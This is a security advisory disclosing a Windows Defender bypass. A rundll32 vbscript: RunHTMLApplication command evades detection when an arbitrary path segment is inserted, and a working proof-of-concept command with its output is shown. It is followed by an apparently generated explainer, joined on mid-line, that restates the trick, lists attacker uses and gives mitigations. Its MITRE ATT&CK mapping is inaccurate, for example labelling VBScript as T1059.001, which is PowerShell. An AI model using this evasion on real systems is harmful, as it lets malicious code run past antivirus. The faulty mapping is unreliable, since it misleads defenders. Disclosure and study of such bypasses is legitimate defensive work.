Microsoft Windows Defender - VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.
Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with
an "Access is denied" message.
Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.
However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.
Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.
E.g.
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
[Exploit/POC]
Open command prompt as Administrator
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
We win!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinxMicrosoft Windows Defender VBScript Detection Bypass: Exploiting Rundll32 for TrojanWin32/Powessere.G Evasion
Recent research by cybersecurity expert John Page (aka hyp3rlinx) has uncovered a novel bypass technique that circumvents Microsoft Windows Defender's detection mechanisms for the TrojanWin32/Powessere.G malware family. This vulnerability leverages the rundll32.exe binary — a legitimate Windows utility — in combination with VBScript and the ActiveX engine to execute arbitrary commands, such as launching calc.exe, while evading antivirus detection.
Understanding the TrojanWin32/Powessere.G Threat
Originally identified as POWERLIKS, TrojanWin32/Powessere.G is a sophisticated trojan designed to execute remote commands via the rundll32.exe interface. It exploits the system's trust in legitimate binaries to execute malicious payloads. Windows Defender typically blocks such attempts with an Access is denied error, preventing execution.
However, hyp3rlinx discovered that subtle modifications to the path structure within the rundll32 command can bypass these detection rules. This technique builds on prior work where JavaScript-based payloads were used to evade detection — now extended to VBScript, demonstrating that the defense mechanisms are not robust against all scripting languages.
Exploitation Mechanism: Path Obfuscation via MSHTML
The core of the bypass lies in manipulating the mshtml path within the rundll32 command. The original command structure is:
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)When executed, Windows Defender blocks this attempt, displaying:
Access is denied.Yet, by introducing arbitrary text in the path — such as LoL or PWN — the detection logic fails to trigger. The modified command becomes:
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)Result: Calc.exe launches successfully — demonstrating a full bypass of Windows Defender.
Why This Works: Detection Logic Flaws
Windows Defender employs heuristic and pattern-based detection to identify known malicious patterns. In this case, it likely scans for the mshtml path structure in rundll32 commands. However, the presence of non-standard path segments — such as LoL — breaks the expected pattern, causing the detection engine to misclassify the payload as benign.
This highlights a critical flaw: defensive systems are often based on static signatures or path patterns, which can be easily circumvented through obfuscation. The system does not analyze the actual script content or intent — only the path structure.
Real-World Use Case: Malicious Payload Execution
Attackers can use this bypass to execute arbitrary commands without triggering alerts. For example:
- Launching
cmd.exefor command-line access. - Downloading additional payloads from remote servers.
- Disabling security features via
Wscript.Shellcalls.
As demonstrated in the proof-of-concept (POC), the String(CreateObject("Wscript.Shell").Run("calc.exe"),0) portion is fully functional, proving that VBScript execution is not blocked when the path is altered.
Technical Deep Dive: Rundll32 and ActiveX
rundll32.exe is a Windows utility designed to load and execute DLL functions. It can be used to invoke RunHTMLApplication from the mshtml.dll library, which is part of the Internet Explorer HTML rendering engine.
When the vbscript: protocol is used, the system activates the VBScript engine and the ActiveX runtime. This allows execution of scripts that interact with the Windows environment via objects like Wscript.Shell.
Security analysts note that this technique exploits a trusted system component — rundll32 — to perform malicious actions, making it a classic example of Living-off-the-Land (LOL) tactics.
MITRE ATT&CK Mapping
This technique maps to the following MITRE ATT&CK framework techniques:
| Technique | Description |
|---|---|
| T1059.001 — Command and Scripting Interpreter | Uses VBScript to execute commands via rundll32. |
| T1566 — Phishing | Can be delivered via phishing emails with malicious scripts. |
| T1071 — Application Layer Protocol | Uses standard protocols (like vbscript:) to evade detection. |
Recommendations and Mitigation
While Microsoft has not assigned a CVE number to this issue, it remains a high-severity vulnerability due to its ease of exploitation and potential for widespread abuse. The following mitigation strategies are recommended:
- Disable or restrict
rundll32.exeexecution via Group Policy or application control. - Implement behavioral monitoring that tracks script execution, not just path patterns.
- Enable advanced threat detection in Windows Defender, including real-time script analysis.
- Update security baselines to include known bypass patterns (e.g.,
LoL,PWN).
Disclosure Timeline and Responsibility
As per the advisory:
- Vendor Notification: February 18, 2024
- Public Disclosure: February 18, 2024
Authors emphasize that the information is provided "as-is" without warranty. Redistribution is permitted with proper credit to hyp3rlinx and ApparitionSec. The advisory is intended for educational and defensive purposes only.
Conclusion: A Persistent Security Challenge
This bypass demonstrates that even well-established antivirus systems like Windows Defender can be evaded through simple path obfuscation. It underscores the need for dynamic, context-aware detection rather than static pattern matching.
As attackers continue to refine their techniques using trusted binaries and scripting engines, defenders must shift toward behavioral analytics and zero-trust principles. The rundll32 command remains a powerful tool — but one that must be monitored closely.